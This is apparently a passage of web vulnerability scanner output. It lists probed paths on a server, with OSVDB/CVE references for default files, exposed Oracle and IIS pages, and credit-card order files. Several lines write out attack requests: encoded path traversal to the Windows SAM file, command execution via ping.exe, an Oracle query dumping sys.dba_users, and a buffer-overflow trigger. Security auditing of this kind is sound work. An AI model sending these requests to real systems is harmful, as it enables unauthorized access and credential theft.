+ OSVDB-474: /Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0737. https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-013.
+ OSVDB-474: /Sites/Samples/Knowledge/Push/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0737. https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-013.
+ OSVDB-474: /Sites/Samples/Knowledge/Search/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0737. https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-013.
+ OSVDB-474: /SiteServer/Publishing/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0737. https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-013.
+ OSVDB-17671: /siteserver/publishing/viewcode.asp?source=/default.asp: May be able to view source code using Site Server vulnerability.
+ OSVDB-4908: /securelogin/1,2345,A,00.html: Vignette Story Server v4.1, 6, may disclose sensitive information via a buffer overflow.
+ OSVDB-5092: /config.inc: DotBr 0.1 configuration file includes usernames and passwords.
+ OSVDB-5095: /sysuser/docmgr/ieedit.stm?url=../: Sambar default file may allow directory listings.
+ OSVDB-5096: /sysuser/docmgr/iecreate.stm?template=../: Sambar default file may allow directory listings.
+ OSVDB-539: /catinfo: May be vulnerable to a buffer overflow. Request '/catinfo?' and add on 2048 of garbage to test.
+ OSVDB-5407: /soap/servlet/soaprouter: Oracle 9iAS SOAP components allow anonymous users to deploy applications by default.
+ OSVDB-5523: /MWS/HandleSearch.html?searchTarget=test&B1=Submit: MyWebServer 1.0.2 may be vulnerable to a buffer overflow (untested). Upgrade to a later version if 990b of searched data crashes the server.
+ OSVDB-562: /server-info: This gives a lot of Apache information. Comment out appropriate line in httpd.conf or restrict access to allowed hosts.
+ OSVDB-5709: /.nsconfig: Contains authorization information
+ OSVDB-583: /cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%69%6E%64%6F%77%73%2Fping.exe%20127.0.0.1: Specially formatted strings allow command execution. Upgrade to version 1.15 or higher. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0011.
+ OSVDB-596: /dc/auth_data/auth_user_file.txt: The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.
+ OSVDB-596: /dc/orders/orders.txt: The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.
+ OSVDB-596: /dcshop/auth_data/auth_user_file.txt: The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.
+ OSVDB-596: /dcshop/orders/orders.txt: The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.
+ OSVDB-6666: /cgi-bin/hpnst.exe?c=p+i=SrvSystemInfo.html: HP Instant TopTools GoAhead WebServer hpnst.exe may be vulnerable to a DoS.
+ OSVDB-6670: /applist.asp: Citrix server may allow remote users to view applications installed without authenticating.
+ OSVDB-6671: /launch.asp?NFuse_Application=LookOut&NFuse_MIMEExtension=.ica: Citrix server may reveal sensitive information by accessing the 'advanced' tab on hte login screen.
+ OSVDB-6672: /_layouts/alllibs.htm: Microsoft SharePoint Portal and Team Services vulnerable to NT or NTLM authentication bypass on Win2000 SP4 using IE 6.x. Bugtraq 03-11-19 post by arkanian@hacker.am
+ OSVDB-6672: /_layouts/settings.htm: Microsoft SharePoint Portal and Team Services vulnerable to NT or NTLM authentication bypass on Win2000 SP4 using IE 6.x. Bugtraq 03-11-19 post by arkanian@hacker.am
+ OSVDB-6672: /_layouts/userinfo.htm: Microsoft SharePoint Portal and Team Services vulnerable to NT or NTLM authentication bypass on Win2000 SP4 using IE 6.x. Bugtraq 03-11-19 post by arkanian@hacker.am
+ OSVDB-670: /stronghold-info: Redhat Stronghold from versions 2.3 up to 3.0 discloses sensitive information. This gives information on configuration. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0868.
+ OSVDB-670: /stronghold-status: Redhat Stronghold from versions 2.3 up to 3.0 discloses sensitive information. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0868.
+ OSVDB-7: /iissamples/exair/howitworks/Code.asp: Scripts within the Exair package on IIS 4 can be used for a DoS against the server. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0449. BID-193.
+ OSVDB-7: /iissamples/exair/howitworks/Codebrw1.asp: This is a default IIS script/file which should be removed, it may allow a DoS against the server. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0738. https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-013. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0449. BID-193.
+ OSVDB-707: /globals.jsa: Oracle globals.jsa file
+ OSVDB-721: /..%252f..%252f..%252f..%252f..%252f../windows/repair/sam: BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.
+ OSVDB-721: /..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam: BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.
+ OSVDB-721: /..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam._: BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.
+ OSVDB-721: /..%255c..%255c..%255c..%255c..%255c../windows/repair/sam: BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.
+ OSVDB-721: /..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam: BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.
+ OSVDB-721: /..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam._: BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.
+ OSVDB-721: /..%2F..%2F..%2F..%2F..%2F../windows/repair/sam: BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.
+ OSVDB-721: /..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam: BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.
+ OSVDB-721: /..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam._: BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.
+ OSVDB-789: /iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp: IIS may be vulnerable to source code viewing via the example CodeBrws.asp file. Remove all default files from the web root. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0739. https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-013.
+ OSVDB-9624: /pass_done.php: PY-Membres 4.2 may allow users to execute a query which generates a list of usernames and passwords.
+ OSVDB-9624: /admin/admin.php?adminpy=1: PY-Membres 4.2 may allow administrator access.
+ OSVDB-3092: /README: README file found.
+ OSVDB-3233: /j2ee/: j2ee directory found--possibly an Oracle app server directory.
+ OSVDB-3233: /WebCacheDemo.html: Oracle WebCache Demo
+ OSVDB-32333: /webcache/: Oracle WebCache Demo
+ OSVDB-3233: /webcache/webcache.xml: Oracle WebCache Demo
+ OSVDB-3233: /bmp/: SQLJ Demo Application
+ OSVDB-3233: /bmp/global-web-application.xml: SQLJ Demo Application
+ OSVDB-3233: /bmp/JSPClient.java: SQLJ Demo Application
+ OSVDB-3233: /bmp/mime.types: SQLJ Demo Application
+ OSVDB-3233: /bmp/README.txt: SQLJ Demo Application
+ OSVDB-3233: /bmp/sqljdemo.jsp: SQLJ Demo Application
+ OSVDB-3233: /bmp/setconn.jsp: SQLJ Demo Application
+ OSVDB-3233: /ptg_upgrade_pkg.log: Oracle log files.
+ OSVDB-3233: /OA_HTML/oam/weboam.log: Oracle log files.
+ OSVDB-3233: /webapp/admin/_pages/_bc4jadmin/: Oracle JSP files
+ OSVDB-3233: /_pages/_webapp/_admin/_showpooldetails.java: Oracle JSP files
+ OSVDB-3233: /_pages/_webapp/_admin/_showjavartdetails.java: Oracle JSP file
+ OSVDB-3233: /_pages/_demo/: Oracle JSP file
+ OSVDB-3233: /_pages/_webapp/_jsp/: Oracle JSP file.
+ OSVDB-3233: /_pages/_demo/_sql/: Oracle JSP file.
+ OSVDB-3233: /OA_HTML/_pages/: Oracle JSP file.
+ OSVDB-3233: /OA_HTML/webtools/doc/index.html: Cabo DHTML Components Help Page
+ OSVDB-18114: /reports/rwservlet?server=repserv+report=/tmp/hacker.rdf+destype=cache+desformat=PDF: Oracle Reports rwservlet report Variable Arbitrary Report Executable Execution
+ OSVDB-3233: /apex/: Oracle Application Express login screen.
+ OSVDB-3233: /OA_JAVA/: Oracle Applications Portal Page
+ OSVDB-3233: /OA_HTML/: Oracle Applications Portal Page
+ OSVDB-3233: /aplogon.html: Oracle Applications Portal Page
+ OSVDB-3233: /appdet.html: Oracle Applications Portal Pages
+ OSVDB-3233: /servlets/weboam/oam/oamLogin: Oracle Application Manager
+ OSVDB-3233: /OA_HTML/PTB/mwa_readme.htm: Oracle Mobile Applications Industrial Server administration and configuration inerface
+ OSVDB-3233: /reports/rwservlet: Oracle Reports
+ OSVDB-3233: /reports/rwservlet/showenv: Oracle Reports
+ OSVDB-3233: /reports/rwservlet/showmap: Oracle Reports
+ OSVDB-3233: /reports/rwservlet/showjobs: Oracle Reports
+ OSVDB-3233: /reports/rwservlet/getjobid7?server=myrep: Oracle Reports
+ OSVDB-3233: /reports/rwservlet/getjobid4?server=myrep: Oracle Reports
+ OSVDB-3233: /reports/rwservlet/showmap?server=myserver: Oracle Reports
+ OSVDB-3093: /pls/portal/owa_util.cellsprint?p_theQuery=select: Direct access to Oracle packages could have an unkown impact.
+ OSVDB-3093: /pls/portal/owa_util.listprint?p_theQuery=select: Access to Oracle pages could have an unknown impact.
+ OSVDB-3093: /pls/portal/owa_util.show_query_columns?ctable=sys.dba_users: Access to Oracle pages could have an unknown impact.
+ OSVDB-3093: /pls/portal/owa_util.showsource?cname=owa_util: Access to Oracle pages could have an unknown impact.
+ OSVDB-3093: /pls/portal/owa_util.cellsprint?p_theQuery=select+*+from+sys.dba_users: Access to Oracle pages could have an unknown impact.
+ OSVDB-3093: /pls/portal/owa_util.signature: Access to Oracle pages could have an unknown impact.
+ OSVDB-3093: /pls/portal/HTP.PRINT: Access to Oracle pages could have an unknown impact.
+ OSVDB-3093: /pls/portal/CXTSYS.DRILOAD.VALIDATE_STMT: Access to Oracle pages could have an unknown impact.
+ OSVDB-3093: /pls/portal/PORTAL_DEMO.ORG_CHART.SHOW: Access to Oracle pages could have an unknown impact.
+ OSVDB-3093: /pls/portal/PORTAL.wwv_form.genpopuplist: Access to Oracle pages cold have an unknown impact.
+ OSVDB-3093: /pls/portal/PORTAL.wwv_ui_lovf.show: Access to Oracle pages could have an unknown impact.
+ OSVDB-3093: /pls/portal/PORTAL.wwv_dynxml_generator.show: Access to Oracle pages could have an unknown impact.
+ OSVDB-3093: /pls/portal/PORTAL.home: Access to Oracle pages could have an unknown impact.
+ OSVDB-3093: /pls/portal/PORTAL.wwv_main.render_warning_screen?p_oldurl=inTellectPRO&p_newurl=inTellectPRO: Access to Oracle pages could have an unknown impact.
+ OSVDB-3093: /pls/portal/SELECT: Access to Oracle pages could have an unknown impact.
+ OSVDB-3093: /pls/portal/null: Access to Oracle pages could have an unknown impact.
+ OSVDB-3093: /OA_MEDIA/: Oracle Applications portal pages found.
+ OSVDB-3093: /OA_HTML/META-INF/: Oracle Applications portal pages found.
+ OSVDB-3093: /OA_HTML/jsp/por/services/login.jsp: Oracle Applications portal pages found.
+ OSVDB-3093: /OA_HTML/PTB/ICXINDEXBASECASE.htm: Oracle Applications portal pages found.
+ OSVDB-3093: /OA_HTML/PTB/ECXOTAPing.htm: Oracle Applications portal pages found.
+ OSVDB-3093: /OA_HTML/PTB/xml_sample1.htm: Oracle Applications portal pages found.
+ OSVDB-3093: /OA_HTML/jsp/wf/WFReassign.jsp: Oracle Applications portal pages found.
+ OSVDB-3093: /OA_JAVA/Oracle/: Oracle Applications portal pages found.
+ OSVDB-3093: /OA_JAVA/servlet.zip: Oracle Applications portal pages found.
+ OSVDB-3093: /OA_JAVA/oracle/forms/registry/Registry.dat: Oracle Applications portal pages found.
+ OSVDB-3233: /OA_HTML/jsp/: Oracle Applications portal page found
+ OSVDB-3233: /OA_HTML/jsp/fnd/fndversion.jsp: Oracle Applications help page found.
+ OSVDB-3233: /OA_HTML/jsp/fnd/fndhelp.jsp?dbc=/u01/oracle/prodappl/fnd/11.5.0/secure/dbprod2_prod.dbc: Oracle Applications help page found.
+ OSVDB-3233: /OA_HTML/jsp/fnd/fndhelputil.jsp: Oracle Applications help page found.
+ OSVDB-3092: /install/install.php: Install file found.
+ OSVDB-3092: /cehttp/trace: Sterling Commerce Connect Direct trace log file may contain user ID information.
+ OSVDB-3092: /cehttp/property/: Sterling Commerce Connect Direct configuration files.
+ OSVDB-3233: /doc/icodUserGuide.pdf: Instant Capacity on Demand (iCOD) Userís Guide.
+ OSVDB-3233: /doc/planning_SuperDome_configs.pdf: Planning HP SuperDome Configurations
+ OSVDB-3233: /doc/vxvm/pitc_ag.pdf: VERITAS FlashSnapTM Point-In-Time Copy Solutions documentation.
+ OSVDB-3233: /doc/Judy/Judy_tech_book.pdf: HP Judy documentation found.
+ OSVDB-3233: /doc/vxvm/vxvm_ag.pdf: Veritas Volume Manager documentation.
+ OSVDB-3233: /doc/vxvm/vxvm_hwnotes.pdf: Veritas Volume Manager documentation.
+ OSVDB-3233: /doc/vxvm/vxvm_ig.pdf: Veritas Volume Manager documentation.
+ OSVDB-3233: /doc/vxvm/vxvm_mig.pdf: Veritas Volume Manager documentation.
+ OSVDB-3233: /doc/vxvm/vxvm_tshoot.pdf: Veritas Volume Manager documentation.
+ OSVDB-3233: /doc/vxvm/vxvm_notes.pdf: Veritas Volume Manager documentation.
+ OSVDB-3233: /doc/vxvm/vxvm_ug.pdf: Veritas Volume Manager documentation.
+ OSVDB-3092: /staging/: This may be interesting...
+ OSVDB-3092: /_archive/: Archive found.
+ OSVDB-3092: /INSTALL.txt: Default file found.
+ OSVDB-3092: /UPGRADE.txt: Default file found.
+ OSVDB-3092: /install.php: install.php file found.
+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
+ OSVDB-3092: /upgrade.php: upgrade.php was found.
+ OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
+ OSVDB-3092: /CHANGELOG.txt: A changelog was found.
+ OSVDB-3092: /sitemap.gz: The sitemap.gz file, used for Google indexing, contains an xml representation of the web site's structure.
+ OSVDB-3092: /content/sitemap.gz: The sitemap.gz file, used for Google indexing, contains an xml representation of the web site\'s structure.
+ /webservices/IlaWebServices: Host has the Oracle iLearning environment installed.
+ /phone/: This may be interesting...
+ OSVDB-3092: /Admin/: This might be interesting...
+ OSVDB-3092: /af/: This might be interesting... potential country code (Afghanistan)
+ OSVDB-3092: /ax/: This might be interesting... potential country code (Aland Islands)
+ OSVDB-3092: /al/: This might be interesting... potential country code (Albania)
+ OSVDB-3092: /dz/: This might be interesting... potential country code (Algeria)
+ OSVDB-3092: /as/: This might be interesting... potential country code (American Samoa)
+ OSVDB-3092: /ad/: This might be interesting... potential country code (Andorra)
+ OSVDB-3092: /ao/: This might be interesting... potential country code (Angola)
+ OSVDB-3092: /ai/: This might be interesting... potential country code (Anguilla)
+ OSVDB-3092: /aq/: This might be interesting... potential country code (Antarctica)
+ OSVDB-3092: /ag/: This might be interesting... potential country code (Antigua And Barbuda)
+ OSVDB-3092: /ar/: This might be interesting... potential country code (Argentina)
+ OSVDB-3092: /am/: This might be interesting... potential country code (Armenia)
+ OSVDB-3092: /aw/: This might be interesting... potential country code (Aruba)
+ OSVDB-3092: /au/: This might be interesting... potential country code (Australia)
+ OSVDB-3092: /at/: This might be interesting... potential country code (Austria)
+ OSVDB-3092: /az/: This might be interesting... potential country code (Azerbaijan)
+ OSVDB-3092: /bs/: This might be interesting... potential country code (Bahamas)
+ OSVDB-3092: /bh/: This might be interesting... potential country code (Bahrain)
+ OSVDB-3092: /bd/: This might be interesting... potential country code (Bangladesh)
+ OSVDB-3092: /bb/: This might be interesting... potential country code (Barbados)
+ OSVDB-3092: /by/: This might be interesting... potential country code (Belarus)
+ OSVDB-3092: /be/: This might be interesting... potential country code (Belgium)
+ OSVDB-3092: /bz/: This might be interesting... potential country code (Belize)
+ OSVDB-3092: /bj/: This might be interesting... potential country code (Benin)
+ OSVDB-3092: /bm/: This might be interesting... potential country code (Bermuda)
+ OSVDB-3092: /bt/: This might be interesting... potential country code (Bhutan)
+ OSVDB-3092: /bo/: This might be interesting... potential country code (Bolivia)
+ OSVDB-3092: /ba/: This might be interesting... potential country code (Bosnia And Herzegovina)
+ OSVDB-3092: /bw/: This might be interesting... potential country code (Botswana)
+ OSVDB-3092: /bv/: This might be interesting... potential country code (Bouvet Island)
+ OSVDB-3092: /br/: This might be interesting... potential country code (Brazil)
+ OSVDB-3092: /io/: This might be interesting... potential country code (British Indian Ocean Territory)
+ OSVDB-3092: /bn/: This might be interesting... potential country code (Brunei Darussalam)
+ OSVDB-3092: /bg/: This might be interesting... potential country code (Bulgaria)
+ OSVDB-3092: /bf/: This might be interesting... potential country code (Burkina Faso)
+ OSVDB-3092: /bi/: This might be interesting... potential country code (Burundi)
+ OSVDB-3092: /kh/: This might be interesting... potential country code (Cambodia)
+ OSVDB-3092: /cm/: This might be interesting... potential country code (Cameroon)
+ OSVDB-3092: /ca/: This might be interesting... potential country code (Canada)
+ OSVDB-3092: /cv/: This might be interesting... potential country code (Cape Verde)
+ OSVDB-3092: /ky/: This might be interesting... potential country code (Cayman Islands)
+ OSVDB-3092: /cf/: This might be interesting... potential country code (Central African Republic)
+ OSVDB-3092: /td/: This might be interesting... potential country code (Chad)
+ OSVDB-3092: /cl/: This might be interesting... potential country code (Chile)
+ OSVDB-3092: /cn/: This might be interesting... potential country code (China)
+ OSVDB-3092: /cx/: This might be interesting... potential country code (Christmas Island)
+ OSVDB-3092: /cc/: This might be interesting... potential country code (Cocos (keeling) Islands)
+ OSVDB-3092: /co/: This might be interesting... potential country code (Colombia)
+ OSVDB-3092: /km/: This might be interesting... potential country code (Comoros)
+ OSVDB-3092: /cg/: This might be interesting... potential country code (Congo)
+ OSVDB-3092: /cd/: This might be interesting... potential country code (The Democratic Republic Of The Congo)
+ OSVDB-3092: /ck/: This might be interesting... potential country code (Cook Islands)
+ OSVDB-3092: /cr/: This might be interesting... potential country code (Costa Rica)
+ OSVDB-3092: /ci/: This might be interesting... potential country code (CÔte D'ivoire)
+ OSVDB-3092: /hr/: This might be interesting... potential country code (Croatia)
+ OSVDB-3092: /cu/: This might be interesting... potential country code (Cuba)
+ OSVDB-3092: /cy/: This might be interesting... potential country code (Cyprus)
+ OSVDB-3092: /cz/: This might be interesting... potential country code (Czech Republic)
+ OSVDB-3092: /dk/: This might be interesting... potential country code (Denmark)
+ OSVDB-3092: /dj/: This might be interesting... potential country code (Djibouti)
+ OSVDB-3092: /dm/: This might be interesting... potential country code (Dominica)
+ OSVDB-3092: /do/: This might be interesting... potential country code (Dominican Republic)
+ OSVDB-3092: /ec/: This might be interesting... potential country code (Ecuador)
+ OSVDB-3092: /eg/: This might be interesting... potential country code (Egypt)
+ OSVDB-3092: /sv/: This might be interesting... potential country code (El Salvador)
+ OSVDB-3092: /gq/: This might be interesting... potential country code (Equatorial Guinea)
+ OSVDB-3092: /er/: This might be interesting... potential country code (Eritrea)
+ OSVDB-3092: /ee/: This might be interesting... potential country code (Estonia)
+ OSVDB-3092: /et/: This might be interesting... potential country code (Ethiopia)
+ OSVDB-3092: /fk/: This might be interesting... potential country code (Falkland Islands (malvinas))
+ OSVDB-3092: /fo/: This might be interesting... potential country code (Faroe Islands)
+ OSVDB-3092: /fj/: This might be interesting... potential country code (Fiji)
+ OSVDB-3092: /fi/: This might be interesting... potential country code (Finland)
+ OSVDB-3092: /fr/: This might be interesting... potential country code (France)
+ OSVDB-3092: /gf/: This might be interesting... potential country code (French Guiana)
+ OSVDB-3092: /pf/: This might be interesting... potential country code (French Polynesia)
+ OSVDB-3092: /tf/: This might be interesting... potential country code (French Southern Territories)
+ OSVDB-3092: /ga/: This might be interesting... potential country code (Gabon)
+ OSVDB-3092: /gm/: This might be interesting... potential country code (Gambia)
+ OSVDB-3092: /ge/: This might be interesting... potential country code (Georgia)
+ OSVDB-3092: /de/: This might be interesting... potential country code (Germany)
+ OSVDB-3092: /gh/: This might be interesting... potential country code (Ghana)
+ OSVDB-3092: /gi/: This might be interesting... potential country code (Gibraltar)
+ OSVDB-3092: /gr/: This might be interesting... potential country code (Greece)
+ OSVDB-3092: /gl/: This might be interesting... potential country code (Greenland)
+ OSVDB-3092: /gd/: This might be interesting... potential country code (Grenada)
+ OSVDB-3092: /gp/: This might be interesting... potential country code (Guadeloupe)
+ OSVDB-3092: /gu/: This might be interesting... potential country code (Guam)
+ OSVDB-3092: /gt/: This might be interesting... potential country code (Guatemala)
+ OSVDB-3092: /gg/: This might be interesting... potential country code (Guernsey)
+ OSVDB-3092: /gn/: This might be interesting... potential country code (Guinea)
+ OSVDB-3092: /gw/: This might be interesting... potential country code (Guinea-bissau)
+ OSVDB-3092: /gy/: This might be interesting... potential country code (Guyana)
+ OSVDB-3092: /ht/: This might be interesting... potential country code (Haiti)
+ OSVDB-3092: /hm/: This might be interesting... potential country code (Heard Island And Mcdonald Islands)
+ OSVDB-3092: /va/: This might be interesting... potential country code (Holy See (vatican City State))
+ OSVDB-3092: /hn/: This might be interesting... potential country code (Honduras)
+ OSVDB-3092: /hk/: This might be interesting... potential country code (Hong Kong)
+ OSVDB-3092: /hu/: This might be interesting... potential country code (Hungary)
+ OSVDB-3092: /is/: This might be interesting... potential country code (Iceland)
+ OSVDB-3092: /in/: This might be interesting... potential country code (India)
+ OSVDB-3092: /id/: This might be interesting... potential country code (Indonesia)
+ OSVDB-3092: /ir/: This might be interesting... potential country code (Islamic Republic Of Iran)
+ OSVDB-3092: /iq/: This might be interesting... potential country code (Iraq)
+ OSVDB-3092: /ie/: This might be interesting... potential country code (Ireland)
+ OSVDB-3092: /im/: This might be interesting... potential country code (Isle Of Man)
+ OSVDB-3092: /il/: This might be interesting... potential country code (Israel)
+ OSVDB-3092: /it/: This might be interesting... potential country code (Italy)
+ OSVDB-3092: /jm/: This might be interesting... potential country code (Jamaica)
+ OSVDB-3092: /jp/: This might be interesting... potential country code (Japan)
+ OSVDB-3092: /je/: This might be interesting... potential country code (Jersey)
+ OSVDB-3092: /jo/: This might be interesting... potential country code (Jordan)
+ OSVDB-3092: /kz/: This might be interesting... potential country code (Kazakhstan)
+ OSVDB-3092: /ke/: This might be interesting... potential country code (Kenya)
+ OSVDB-3092: /ki/: This might be interesting... potential country code (Kiribati)
+ OSVDB-3092: /kp/: This might be interesting... potential country code (Democratic People's Republic Of Korea)
+ OSVDB-3092: /kr/: This might be interesting... potential country code (Republic Of Korea)
+ OSVDB-3092: /kw/: This might be interesting... potential country code (Kuwait)
+ OSVDB-3092: /kg/: This might be interesting... potential country code (Kyrgyzstan)
+ OSVDB-3092: /la/: This might be interesting... potential country code (Lao People's Democratic Republic)
+ OSVDB-3092: /lv/: This might be interesting... potential country code (Latvia)
+ OSVDB-3092: /lb/: This might be interesting... potential country code (Lebanon)
+ OSVDB-3092: /ls/: This might be interesting... potential country code (Lesotho)
+ OSVDB-3092: /lr/: This might be interesting... potential country code (Liberia)
+ OSVDB-3092: /ly/: This might be interesting... potential country code (Libyan Arab Jamahiriya)
+ OSVDB-3092: /li/: This might be interesting... potential country code (Liechtenstein)
+ OSVDB-3092: /lt/: This might be interesting... potential country code (Lithuania)
+ OSVDB-3092: /lu/: This might be interesting... potential country code (Luxembourg)
+ OSVDB-3092: /mo/: This might be interesting... potential country code (Macao)
+ OSVDB-3092: /mk/: This might be interesting... potential country code (Macedonia)
+ OSVDB-3092: /mg/: This might be interesting... potential country code (Madagascar)
+ OSVDB-3092: /mw/: This might be interesting... potential country code (Malawi)
+ OSVDB-3092: /my/: This might be interesting... potential country code (Malaysia)
+ OSVDB-3092: /mv/: This might be interesting... potential country code (Maldives)
+ OSVDB-3092: /ml/: This might be interesting... potential country code (Mali)
+ OSVDB-3092: /mt/: This might be interesting... potential country code (Malta)
+ OSVDB-3092: /mh/: This might be interesting... potential country code (Marshall Islands)
+ OSVDB-3092: /mq/: This might be interesting... potential country code (Martinique)
+ OSVDB-3092: /mr/: This might be interesting... potential country code (Mauritania)
+ OSVDB-3092: /mu/: This might be interesting... potential country code (Mauritius)
+ OSVDB-3092: /yt/: This might be interesting... potential country code (Mayotte)
+ OSVDB-3092: /mx/: This might be interesting... potential country code (Mexico)
+ OSVDB-3092: /fm/: This might be interesting... potential country code (Federated States Of Micronesia)
+ OSVDB-3092: /md/: This might be interesting... potential country code (Republic Of Moldova)
+ OSVDB-3092: /mc/: This might be interesting... potential country code (Monaco)
+ OSVDB-3092: /mn/: This might be interesting... potential country code (Mongolia)
+ OSVDB-3092: /me/: This might be interesting... potential country code (Montenegro)
+ OSVDB-3092: /ms/: This might be interesting... potential country code (Montserrat)
+ OSVDB-3092: /ma/: This might be interesting... potential country code (Morocco)
+ OSVDB-3092: /mz/: This might be interesting... potential country code (Mozambique)
+ OSVDB-3092: /mm/: This might be interesting... potential country code (Myanmar)
+ OSVDB-3092: /na/: This might be interesting... potential country code (Namibia)
+ OSVDB-3092: /nr/: This might be interesting... potential country code (Nauru)
+ OSVDB-3092: /np/: This might be interesting... potential country code (Nepal)
+ OSVDB-3092: /nl/: This might be interesting... potential country code (Netherlands)
+ OSVDB-3092: /an/: This might be interesting... potential country code (Netherlands Antilles)
+ OSVDB-3092: /nc/: This might be interesting... potential country code (New Caledonia)
+ OSVDB-3092: /nz/: This might be interesting... potential country code (New Zealand)
+ OSVDB-3092: /ni/: This might be interesting... potential country code (Nicaragua)
+ OSVDB-3092: /ne/: This might be interesting... potential country code (Niger)
+ OSVDB-3092: /ng/: This might be interesting... potential country code (Nigeria)
+ OSVDB-3092: /nu/: This might be interesting... potential country code (Niue)
+ OSVDB-3092: /nf/: This might be interesting... potential country code (Norfolk Island)
+ OSVDB-3092: /mp/: This might be interesting... potential country code (Northern Mariana Islands)
+ OSVDB-3092: /no/: This might be interesting... potential country code (Norway)
+ OSVDB-3092: /om/: This might be interesting... potential country code (Oman)
+ OSVDB-3092: /pk/: This might be interesting... potential country code (Pakistan)
+ OSVDB-3092: /pw/: This might be interesting... potential country code (Palau)
+ OSVDB-3092: /ps/: This might be interesting... potential country code (Palestinian Territory)
+ OSVDB-3092: /pa/: This might be interesting... potential country code (Panama)
+ OSVDB-3092: /pg/: This might be interesting... potential country code (Papua New Guinea)
+ OSVDB-3092: /py/: This might be interesting... potential country code (Paraguay)
+ OSVDB-3092: /pe/: This might be interesting... potential country code (Peru)
+ OSVDB-3092: /ph/: This might be interesting... potential country code (Philippines)
+ OSVDB-3092: /pn/: This might be interesting... potential country code (Pitcairn)
+ OSVDB-3092: /pl/: This might be interesting... potential country code (Poland)
+ OSVDB-3092: /pt/: This might be interesting... potential country code (Portugal)
+ OSVDB-3092: /pr/: This might be interesting... potential country code (Puerto Rico)
+ OSVDB-3092: /qa/: This might be interesting... potential country code (Qatar)
+ OSVDB-3092: /re/: This might be interesting... potential country code (RÉunion)
+ OSVDB-3092: /ro/: This might be interesting... potential country code (Romania)
+ OSVDB-3092: /ru/: This might be interesting... potential country code (Russian Federation)
+ OSVDB-3092: /rw/: This might be interesting... potential country code (Rwanda)
+ OSVDB-3092: /bl/: This might be interesting... potential country code (Saint BarthÉlemy)
+ OSVDB-3092: /sh/: This might be interesting... potential country code (Saint Helena)
+ OSVDB-3092: /kn/: This might be interesting... potential country code (Saint Kitts And Nevis)
+ OSVDB-3092: /lc/: This might be interesting... potential country code (Saint Lucia)
+ OSVDB-3092: /mf/: This might be interesting... potential country code (Saint Martin)
+ OSVDB-3092: /pm/: This might be interesting... potential country code (Saint Pierre And Miquelon)
+ OSVDB-3092: /vc/: This might be interesting... potential country code (Saint Vincent And The Grenadines)
+ OSVDB-3092: /ws/: This might be interesting... potential country code (Samoa)
+ OSVDB-3092: /sm/: This might be interesting... potential country code (San Marino)
+ OSVDB-3092: /st/: This might be interesting... potential country code (Sao Tome And Principe)
+ OSVDB-3092: /sa/: This might be interesting... potential country code (Saudi Arabia)
+ OSVDB-3092: /sn/: This might be interesting... potential country code (Senegal)
+ OSVDB-3092: /rs/: This might be interesting... potential country code (Serbia)
+ OSVDB-3092: /sc/: This might be interesting... potential country code (Seychelles)
+ OSVDB-3092: /sl/: This might be interesting... potential country code (Sierra Leone)
+ OSVDB-3092: /sg/: This might be interesting... potential country code (Singapore)
+ OSVDB-3092: /sk/: This might be interesting... potential country code (Slovakia)
+ OSVDB-3092: /si/: This might be interesting... potential country code (Slovenia)
+ OSVDB-3092: /sb/: This might be interesting... potential country code (Solomon Islands)
+ OSVDB-3092: /so/: This might be interesting... potential country code (Somalia)
+ OSVDB-3092: /za/: This might be interesting... potential country code (South Africa)
